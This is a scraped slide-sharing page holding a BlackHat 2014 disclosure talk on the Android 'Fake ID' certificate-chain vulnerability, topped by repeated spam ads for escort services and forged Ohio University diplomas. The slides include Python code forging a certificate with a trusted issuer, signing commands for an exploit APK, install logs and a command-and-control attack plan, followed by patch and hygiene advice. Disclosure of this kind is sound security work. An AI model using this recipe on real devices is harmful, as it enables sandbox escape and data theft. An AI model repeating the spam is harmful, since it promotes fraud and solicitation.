CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun serviceCALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun serviceanilsa9823
 
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,Pooja Nehwal
 
哪里有卖的《俄亥俄大学学历证书+俄亥俄大学文凭证书+俄亥俄大学学位证书》Q微信741003700《俄亥俄大学学位证书复制》办理俄亥俄大学毕业证成绩单|购买...
哪里有卖的《俄亥俄大学学历证书+俄亥俄大学文凭证书+俄亥俄大学学位证书》Q微信741003700《俄亥俄大学学位证书复制》办理俄亥俄大学毕业证成绩单|购买...哪里有卖的《俄亥俄大学学历证书+俄亥俄大学文凭证书+俄亥俄大学学位证书》Q微信741003700《俄亥俄大学学位证书复制》办理俄亥俄大学毕业证成绩单|购买...
哪里有卖的《俄亥俄大学学历证书+俄亥俄大学文凭证书+俄亥俄大学学位证书》Q微信741003700《俄亥俄大学学位证书复制》办理俄亥俄大学毕业证成绩单|购买...wyqazy
 
Chandigarh Call Girls Service ❤️🍑 9115573837 👄🫦Independent Escort Service Cha...
Chandigarh Call Girls Service ❤️🍑 9115573837 👄🫦Independent Escort Service Cha...Chandigarh Call Girls Service ❤️🍑 9115573837 👄🫦Independent Escort Service Cha...
Chandigarh Call Girls Service ❤️🍑 9115573837 👄🫦Independent Escort Service Cha...Niamh verma
 
9892124323 | Book Call Girls in Juhu and escort services 24x7
9892124323 | Book Call Girls in Juhu and escort services 24x79892124323 | Book Call Girls in Juhu and escort services 24x7
9892124323 | Book Call Girls in Juhu and escort services 24x7Pooja Nehwal
 
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual service
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual serviceCALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual service
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual serviceanilsa9823
 

Recently uploaded (7)

Model Call Girl in Shalimar Bagh Delhi reach out to us at 🔝8264348440🔝
Model Call Girl in Shalimar Bagh Delhi reach out to us at 🔝8264348440🔝Model Call Girl in Shalimar Bagh Delhi reach out to us at 🔝8264348440🔝
Model Call Girl in Shalimar Bagh Delhi reach out to us at 🔝8264348440🔝
 
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun serviceCALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
 
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,
Call US Pooja 9892124323 ✓Call Girls In Mira Road ( Mumbai ) secure service,
 
哪里有卖的《俄亥俄大学学历证书+俄亥俄大学文凭证书+俄亥俄大学学位证书》Q微信741003700《俄亥俄大学学位证书复制》办理俄亥俄大学毕业证成绩单|购买...
哪里有卖的《俄亥俄大学学历证书+俄亥俄大学文凭证书+俄亥俄大学学位证书》Q微信741003700《俄亥俄大学学位证书复制》办理俄亥俄大学毕业证成绩单|购买...哪里有卖的《俄亥俄大学学历证书+俄亥俄大学文凭证书+俄亥俄大学学位证书》Q微信741003700《俄亥俄大学学位证书复制》办理俄亥俄大学毕业证成绩单|购买...
哪里有卖的《俄亥俄大学学历证书+俄亥俄大学文凭证书+俄亥俄大学学位证书》Q微信741003700《俄亥俄大学学位证书复制》办理俄亥俄大学毕业证成绩单|购买...
 
Chandigarh Call Girls Service ❤️🍑 9115573837 👄🫦Independent Escort Service Cha...
Chandigarh Call Girls Service ❤️🍑 9115573837 👄🫦Independent Escort Service Cha...Chandigarh Call Girls Service ❤️🍑 9115573837 👄🫦Independent Escort Service Cha...
Chandigarh Call Girls Service ❤️🍑 9115573837 👄🫦Independent Escort Service Cha...
 
9892124323 | Book Call Girls in Juhu and escort services 24x7
9892124323 | Book Call Girls in Juhu and escort services 24x79892124323 | Book Call Girls in Juhu and escort services 24x7
9892124323 | Book Call Girls in Juhu and escort services 24x7
 
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual service
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual serviceCALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual service
CALL ON ➥8923113531 🔝Call Girls Saharaganj Lucknow best sexual service
 

Android Vulnerability: Fake ID

  • 1. AVnudlrnoeidra Fbailkitey ID Jeff Forristal / Bluebox BlackHat US 2014
  • 2. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Jeff Forristal, CTO of Bluebox Security Discovered Android Masterkey vulnerability in 2013 Contributing to the security industry for 15+ years Masterkey
  • 3. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 bug# 13678484 Security sandbox escape Usable by malware Allows data theft, device control All by presenting a fake signature identification A.k.a. the “Fake ID” vulnerability
  • 4. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Application Identities / Signatures Jeff Forristal / Bluebox
  • 5. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Android applications are signed The signature is the base of multiple security features Signatures
  • 6. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 0101010101010 1010101010101 0101010101010 1010101010101 0101010101010 Subject: devel Issuer: devel Public key: 1010101010101 0101010101010 Opaque Signature Public Certificate PKCS7 Object Signatures *.SF Manifest *.MF Application APK Assets Manifest Classes.dex Resources XML File: hash File: hash File: hash File: hash File: hash File: hash File: hash File: hash File: hash File: hash Envelope CerFficate Signature Hierarchy
  • 7. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: MySelf -­‐-­‐ BEGIN PUBLIC KEY -­‐-­‐-­‐ … Issuer: MySelf Issuer Signature: … crypto … -­‐-­‐ BEGIN PRIVATE KEY -­‐-­‐-­‐ … Subject: www.bluebox.com -­‐-­‐ BEGIN PUBLIC KEY -­‐-­‐-­‐ … Issuer: Verisign CA Issuer Signature: Certificates 101 … crypto … -­‐-­‐ BEGIN PRIVATE KEY -­‐-­‐-­‐ … Subject: Verisign CA -­‐-­‐ BEGIN PUBLIC KEY -­‐-­‐-­‐ … Issuer: … Issuer Signature: … -­‐-­‐ BEGIN PRIVATE KEY -­‐-­‐-­‐ …
  • 8. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: client Public Key Issuer: SubCA1 Issuer Signature Public Key Issuer: SubCA2 Certificate Chaining Subject: SubCA1 Issuer Signature Subject: SubCA2 Public Key Issuer: CA Issuer Signature Subject: CA Public Key Issuer: CA Issuer Signature Immediate identity / signer Trusted root certificate Private Key
  • 9. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: client Public Key Issuer: SubCA1 Issuer Signature Subject: SubCA1 Public Key Issuer: CA Issuer Signature Subject: CA Public Key Issuer: CA Issuer Signature Android On A Normal Day Subject: client Public Key Issuer: SubCA1 Issuer Signature Subject: SubCA1 Public Key Issuer: CA Issuer Signature Subject: CA Public Key Issuer: CA Issuer Signature
  • 10. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Vulnerability Mechanics Jeff Forristal / Bluebox
  • 11. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Applications attempt to verify the signing of other applications PackageInfo pkgInfo = pkgmgr.getPackageInfo( pkg, GET_SIGNATURES ) Signatures[] signatures = pkgInfo.signatures; for (Signature sig : signatures ) { if ( sig.equals( TRUSTED_SIGNATURE ) ) { // trusted signature found, trust the application } } Trust Checking
  • 12. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: client Public Key Issuer: SubCA1 Issuer Signature PKI Chaining Subject: SubCA1 Public Key Issuer: SubCA2 Issuer Signature Subject: SubCA2 Public Key Issuer: CA Issuer Signature Subject: CA Public Key Issuer: CA Issuer Signature Trust? Trust? Trust?
  • 13. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 The logic accepts one trusted certificate anywhere in signature /certificate chain Theory
  • 14. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Reality
  • 15. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Can we make a chain containing a chosen cert? Opportunity
  • 16. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Chain Construction
  • 17. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Chain Construction 1. Verify signature with signer cert 2. Create a chain based on valid signer cert 3. Get the cert’s issuer 4. Find an included cert where included cert subject == previous cert’s issuer 5. Add that cert to the chain
  • 18. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: client Public Key Issuer: SubCA1 Issuer Signature Oops Subject: SubCA1 Public Key Issuer: SubCA2 Issuer Signature Subject: SubCA2 Public Key Issuer: CA Issuer Signature Subject: CA Public Key Issuer: CA Issuer Signature ? ? ? A certificate can claim to be issued by any other certificate … … and that claim is not verified
  • 19. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 This code can now be easily attacked / bypassed PackageInfo pkgInfo = pkgmgr.getPackageInfo( pkg, GET_SIGNATURES ) Signatures[] signatures = pkgInfo.signatures; for (Signature sig : signatures ) { if ( sig.equals( TRUSTED_SIGNATURE ) ) { // trusted signature found, trust the application } } Impact
  • 20. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: AWacker Public Key Issuer: AWacker Issuer Signature Fabrication Subject: TrustedCert Public Key Issuer: … Issuer Signature Private Key No private key! Public cert only!
  • 21. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: AWacker Public Key Issuer: TrustedCert Issuer Signature Fabrication Subject: TrustedCert Public Key Issuer: … Issuer Signature Private Key
  • 22. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: AWacker Public Key Issuer: TrustedCert Issuer Signature Result Subject: TrustedCert Public Key Issuer: … Issuer Signature Trust? Trust?
  • 23. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Exploitation Jeff Forristal / Bluebox
  • 24. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Review all uses of signatures in AOSP Targets Further review of select third-party components involving extra privileges
  • 25. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Webview plugin manager (all AOSP <= 4.3) • Plugins signed by Adobe (Flash) reloaded into any/all apps using framework webview NFC access.xml (all AOSP) • Match a package signature wildcard (Google Wallet), get access to NFC secure element 3LM device management extensions (assorted devices) • Former Google/Motorola technology, included with older devices There will be others identities/vectors… • It’s a general purpose problem Targets - Examples
  • 26. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: trusted_cert Public Key Issuer: … Issuer Signature 1. Create APK with exploit payload suitable for target 2. Isolate trusted certificate 3. Generate a new certificate 4. Set issuer to trusted certificate 5. Package all of it (new cert + target cert as a CA cert) into a PKCS12 file 6. Use the PKCS12 for exploit APK signing Subject: AWacker Issuer: trusted_cert Issuer Signature (broken) Public Key targetcert = OpenSSL.crypto.load_certificate( target ) pk = OpenSSL.crypto.PKey() pk.generate_key( OpenSSL.crypto.TYPE_RSA, 1024) newcert = OpenSSL.crypto.X509() newcert.get_subject().CN = “arbitrary” newcert.set_issuer( targetcert.get_subject() ) newcert.set_pubkey( pk ) newcert.sign( pk, “sha1” ) pkcs12 = OpenSSL.crypto.PKCS12() pkcs12.set_privatekey( pk ) pkcs12.set_certificate( cert ) pkcs12.set_ca_certificates( [targetcert] ) finalPkcs12Data = pkcs12.export( passphrase=“1234” ) Exploit Creation
  • 27. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 jeff$ openssl x509 -­‐in webkit_plugin.pem -­‐noout -­‐text | grep Subject: Subject: C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, OU=… jeff$ python newcert.py webkit_plugin.pem jeff$ openssl x509 -­‐in out.cert -­‐noout -­‐text CerFficate: Data: Version: 1 (0x0) Serial Number: 976234562 (0x3a302842) Signature Algorithm: sha1WithRSAEncrypFon Issuer: C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, OU=… Validity Not Before: Jun 30 23:44:40 2014 GMT Not Aker : Jun 25 23:44:40 2034 GMT Subject: CN=labs.bluebox.com Subject Public Key Info: Public Key Algorithm: rsaEncrypFon RSA Public Key: (1024 bit) Modulus (1024 bit): 00:b4:df:2d:53:9a:f2:8f:61:99:bc:56:19:57:76: … Crafting
  • 28. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 jeff$ keytool -­‐v -­‐importkeystore -­‐srckeystore out.pkcs12 -­‐srcstoretype PKCS12 -­‐destkeystore evil.keystore -­‐deststoretype JKS Enter desFnaFon keystore password: Re-­‐enter new password: Enter source keystore password: Entry for alias 1 successfully imported. Import command completed: 1 entries successfully imported, 0 entries failed or cancelled [Storing evil.keystore] Crafting
  • 29. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 jeff$ jarsigner -­‐verbose -­‐sigalg SHA1withRSA -­‐digestalg SHA1 -­‐keystore evil.keystore Bluebox_SampleWebkitPlugin.apk 1 Enter Passphrase for keystore: Enter key password for 1: adding: META-­‐INF/MANIFEST.MF adding: META-­‐INF/1.SF adding: META-­‐INF/1.RSA signing: AndroidManifest.xml signing: classes.dex signing: lib/armeabi-­‐v7a/libsampleplugin3.so signing: res/drawable-­‐mdpi/ic_launcher.png signing: res/drawable-­‐mdpi/sample_browser_plugin.png signing: res/layout/acFvity_main.xml signing: res/menu/main.xml signing: resources.arsc Crafting
  • 30. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 jeff$ adb install Bluebox_SampleWebkitPlugin.apk 1165 KB/s (39864 bytes in 0.033s) pkg: /data/local/tmp/Bluebox_SampleWebkitPlugin.apk Success I/PackageManager( 433): Running dexopt on: com.bluebox.labs.chainbreak.demo D/dalvikvm(11123): DexOpt: load 23ms, verify+opt 6ms, 282884 bytes I/AcFvityManager( 433): Force stopping package com.bluebox.labs.chainbreak.demo appid=10083 user=-­‐1 W/PackageManager( 433): Unknown permission android.webkit.permission.PLUGIN in package com.bluebox.labs.chainbreak.demo I/Plugin ( 8109): Bluebox running code in this process! I/Plugin ( 8109): -­‐-­‐ uid=10077, pid=8109, process=com.microsok.skydrive I/Plugin ( 5158): Bluebox running code in this process! I/Plugin ( 5158): -­‐-­‐ uid=10054, pid=5158, process=com.google.android.googlequicksearchbox:search I/Plugin (10166): Bluebox running code in this process! I/Plugin (10166): -­‐-­‐ uid=10081, pid=10166, process=com.salesforce.chaWer Fingers Crossed
  • 31. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Live Demo Jeff Forristal / Bluebox
  • 32. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Battle Plan App App App App Evil App plugin.so Evil .so Externally: (Fake) Google Services Update app Internally: Malicious webkit plugin Signed w/ Adobe cert in cert chain
  • 33. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Battle Plan App App App App Evil App plugin.so Evil .so .so .so .so .so
  • 34. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Battle Plan Command & Control Server App App App App Evil App plugin.so Evil .so .so .so .so .so
  • 35. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Mitigation Jeff Forristal / Bluebox
  • 36. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Patched, sent to OHA partners – get your OTAs in the usual manner (if ever) BTW, released to public repo May 21st Patches
  • 37. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Bluebox Security Scanner (free) Jeff Forristal / Bluebox
  • 38. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Stick to known sources for your applications Android 4.4 (KitKat) + is immune to Flash webkit plugin (KitKat replaced webkit webview with chromium) Check your (older) device for 3LM extensions (adb shell getprop | grep ro.3lm.production) Beware of who asks for Device Admin access (Settings -> Security -> Device Administrators) Hygiene